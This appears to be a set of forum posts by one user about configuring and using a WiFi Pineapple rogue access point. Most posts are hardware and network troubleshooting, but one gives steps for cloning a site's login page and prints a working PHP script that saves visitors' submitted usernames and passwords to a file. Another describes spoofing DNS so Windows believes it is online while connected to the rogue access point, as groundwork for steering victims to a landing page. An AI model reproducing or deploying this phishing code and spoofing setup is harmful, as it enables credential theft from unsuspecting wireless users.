coolgeek

I just wanted to share some video tutorials that I have found very helpful in setting up and administering the WiFi pineapple: Security4Plus I'm not sure if the creator is active on the forums, but I have not seen any links to these tutorials. This resource was indispensable to me for setting up remote administration through a VPS.

The problem is that the key never gets sent in plain text. IEEE 802.11 WEP Authentication works as follows: Client sends a request AP sends client a challenge text (i.e. an arbitrary 128-bit number) The client uses the WEP Key to encrypt the challenge text and sends it to the AP The AP checks for accuracy and grants/denies access based on the result The way that WEP Key cracking works is that by capturing packets we gather samples of challenge text and cyphertext pairs to figure out what the key is. Many samples are needed to crack the key effectively. In theory a Pineapple-esque device should be able to make the client reauthenticate itself over and over until enough cyphertext has been captured to crack the key, but I don't think it would be worth the research since WEP is pretty much obsolete. The other question might be if Jasager could be modified to authenticate clients trying to connect to a WEP network; I'm not sure how much work it would be, but doubt that the practicality would pay off.

This is a possible setup, but you will need a second wifi adapter for your pineapple as well. Blacklisting should not be necessary, since surely you don't have it set to auto connect to any network.

I have read about power issues; try checking if you have the same problem when powering through the AC adapter. Also, are you using a USB hub? If so, try plugging the key directly into the pineapple.

Have you tried using the PoE port on the pineapple instead of the WAN? To my knowledge the PoE port is the one that's configured for 172.16.42.42, where as the WAN port attempts to get the new IP for the pineapple through DHCP.

Probably the easiest way to accomplish this is creating a page that is hosted on the pineapple that redirects traffic to the rick roll of your choice :-)

The only parameter that the manual omitted is that the partitions should be created as Primary. It should show up in the Disk Usage section under Resources, even if the drive does not mount to /usb.

It must be to an ip, but since most www.whatever.com sites have a static ip, that isn't too big of a deal.

I'm pretty sure the PoE port is set to connect to 172.16.42.42. Try to give that a shot.

It seems like a problem with ICS - the pineapple is not getting access to the interwebs. You should be able to confirm this my clicking "reveal public ip" on the status page. The only thing that I can think of is playing with the ./wp4.sh script. Have you tried using all the default values, i.e. just pressing enter without entering your own data?

The problem with WPA/WPA2 secured connections is that a 4-way handshake takes place, in which both AP and client confirm the key without actually revealing it. Read more about the process Here.

I have found the easiest way to clone a site is to use google chrome, browser to the site, right-click and select Save As... This gives you the option to download the entire page with all dependencies. From there, just use this resource to modify what happens to the form data. I think Darren wrote the following little php file to store the user credentials from the form data received: <?php $ref = $_SERVER['HTTP_REFERER']; $today = date("F j, Y, g:i a"); if (isset($_POST['name']) && !empty($_POST['name'])) { $nam = stripslashes($_POST['name']); $pas = stripslashes($_POST['pass']); $nam = htmlspecialchars($nam, ENT_QUOTES); $pas = htmlspecialchars($pas, ENT_QUOTES); $content = $today . " -- " . $ref . " -- " . $nam . " -- " . $pas; $filed = @fopen("bitches.txt", "a+"); @fwrite($filed, "$content\n"); @fclose($filed); } ?>

You can use the command df -h My output is the following: Filesystem Size Used Available Use% Mounted on rootfs 960.0K 504.0K 456.0K 53% / /dev/root 5.3M 5.3M 0 100% /rom tmpfs 14.4M 572.0K 13.8M 4% /tmp tmpfs 512.0K 0 512.0K 0% /dev /dev/mtdblock3 960.0K 504.0K 456.0K 53% /overlay overlayfs:/overlay 960.0K 504.0K 456.0K 53% / /dev/sda1 28.4G 577.2M 26.4G 2% /usb My usb drive is detected as /dev/sda1, and mounted to /usb through fstab.

I'm using a 32GB PNY drive and have no issues. The only recommendation I have is checking where the drive is being mounted (/dev/sd??) and modifying the fstab config accordingly. Don't forget the "makeswap" command as well.

As a side note, I tested the Network Connection Status Indicator in windows 8, and it seems that as long as it DNS of dns.msftncsi.com resolves to 131.107.255.25 it shows an internet connection - it looks like MS dropped the validation by downloading the text file. So a simply entry into the DNS Spoof Config can validate that request. I tested this and it works like a charm - NCSI shows an internet connection when connected to an offline pineapple. Now I just need to figure out a way to redirect all other traffic, i.e. hosts other than dns.msftncsi.com, to a landing page. A simple wildcard entry overrides the validation DNS. There's no way to set priorities, is there?